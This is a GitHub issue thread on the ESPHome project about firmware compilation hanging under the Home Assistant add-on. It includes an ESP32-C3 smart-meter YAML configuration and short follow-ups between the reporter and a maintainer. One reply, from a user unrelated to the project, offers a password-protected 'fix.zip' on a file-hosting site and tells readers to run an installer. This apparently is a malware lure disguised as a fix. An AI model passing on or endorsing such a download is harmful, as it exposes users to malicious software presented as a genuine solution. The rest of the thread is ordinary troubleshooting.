esphome/issues #6211: Compilation hangs, multiple retries required, different devices

Qhilm, 2024-08-29:
### The problem

I need to retry at least once each time I upgrade ESPhome on one of my 3 devices. All are ESP32, but different types (ESP-WROOM-32D, ESP32-C3...)

it's the compilation which hangs, not the upload to the device.

I'm wondering if that's expected?

### Which version of ESPHome has the issue?

2024.8.1 and all previous ones since at least a year

### What type of installation are you using?

Home Assistant Add-on

### Which version of Home Assistant has the issue?

2024.8.3 and all previous versions since at least a year

### What platform are you using?

ESP32

### Board

esp32-c3-devkitm-1

### Component causing the issue

update

### Example YAML snippet

```yaml
# BitShake SmartMeterReader Air – custom board with ESP32-C3-MINI-1
# GPIO5 is connected to IR sensor
# SML ESPhome doc:
# https://github.com/esphome/esphome-docs/blob/current/components/sml.rst
# Not using MQTT, just ESPhome native API
# https://esphome.io/components/api.html#advantages-over-mqtt

esphome:
  name: smartmeterreader
  friendly_name: SmartMeterReader

esp32:
  board: esp32-c3-devkitm-1
  framework: 
    # esp-idf framework recommended for ESP32-C3:
    # https://esphome.io/components/esp32.html#esp-idf-framework
    type: esp-idf

# Enable logging
logger: # default: DEBUG
  level: DEBUG

# Enable Home Assistant API
api:
  encryption:
    key: !secret home_assistant_encryption_key

ota:
  password: !secret ota_password
  platform: esphome

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password
  # Enable fallback hotspot (captive portal) in case wifi connection fails
  ap:
    ssid: "${friendly_name} Hotspot"
    password: !secret fallback_ssid_password

captive_portal:

# web GUI not needed unless troubleshooting
web_server:

uart:
  id: uart_bus
  rx_pin: GPIO5
  baud_rate: 9600
  data_bits: 8
  parity: NONE
  stop_bits: 1

sml:
  id: mysml
  uart_id: uart_bus

sensor:
  - platform: sml
    name: "Total energy"
    icon: mdi:meter-electric
    sml_id: mysml
    server_id: "0a01445a470002fbc061" # optional, since there is a single SML input. Enable DEBUG log to find it.
    obis_code: "1-0:1.8.0"
    unit_of_measurement: kWh
    accuracy_decimals: 4
    device_class: energy
    state_class: total_increasing
    filters:
      - multiply: 0.0001

  - platform: sml
    name: "Current power"
    icon: mdi:lightning-bolt-circle
    sml_id: mysml
    server_id: "0a01445a470002fbc061" # optional, since there is a single SML input. Enable DEBUG log to find it.
    obis_code: "1-0:36.7.0"
    unit_of_measurement: W
    accuracy_decimals: 0
    device_class: power
    state_class: measurement
    filters:
      - multiply: 0.01
      # the below line is only required on WS7412 meters returning negative values from time to time.
      # https://github.com/volkszaehler/libsml/pull/136
      - lambda: |-
          return abs(x);
    # options to reduce the rate of updates (multiple times per second on a WS7412 e.g.) while retaining some reactivity using 'delta'
     # - or:
     #   - throttle_average: 5s
     #   - delta: 5%
    # another option:
     # - or:
     #   - median:
     #     window_size: 5
     #     send_every: 5
     #     send_first_at: 3
     #   - delta: 5%

          
  # there are two more OBIS codes, visible when enabling DEBUG logs: 1-0:96.50.1 and 1-0:96.1.0
  # both are static, one is the meter ID, the other is probably the model.

  # Wi-Fi
  # https://github.com/MallocArray/airgradient_esphome/blob/main/packages/sensor_wifi.yaml
  - platform: wifi_signal
    name: "WiFi Signal"
    id: wifi_dbm
    update_interval: 60s

  - platform: internal_temperature
    name: "ESP Temperature"
    id: sys_esp_temperature

  - platform: uptime
    name: "Uptime"
    id: device_uptime

  # diagnostics
  # https://github.com/MallocArray/airgradient_esphome/blob/main/packages/diagnostic.yaml
  - platform: template
    id: esp_memory_percent
    icon: mdi:memory
    name: ESP Percentage Free Memory
    lambda: return heap_caps_get_free_size(MALLOC_CAP_INTERNAL)*100 / 532480;
    unit_of_measurement: "%"
    state_class: measurement
    entity_category: "diagnostic"
  
  - platform: template
    id: esp_memory
    icon: mdi:memory
    name: ESP Free Memory
    lambda: return heap_caps_get_free_size(MALLOC_CAP_INTERNAL) / 1024;
    unit_of_measurement: "kB"
    state_class: measurement
    entity_category: "diagnostic"
```

### Anything in the logs that might be useful for us?

```txt
Not really, it just hangs at seemingly random steps in the compilation. I see CPU load of Home Assistant going down to zero and nothing happens, the "RETRY" button becomes visible.

example right now, the first device (see below) is hanging at:
"Compiling .pioenvs/smartmeterreader/freemodbus/freemodbus/common/esp_modbus_slave.o"

Retrying always fix it, sometimes I have to retry twice.

I have the issue with all my devices so far:

1. esp32-c3-devkitm-1 / ESP32
2. az-delivery-devkit-v4 / ESP32-IDF
3. esp32-c3-devkitm-1 / ESP32-IDF
```

kehkou, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ssieb, 2024-08-29:
What are you running HA on?

Qhilm, 2024-08-29:
Raspberry Pi 4 8GB

Qhilm, 2024-12-28:
Interestingly, if you click "install" from the settings overview, it works every time. It just hangs if I go to the esphome menu.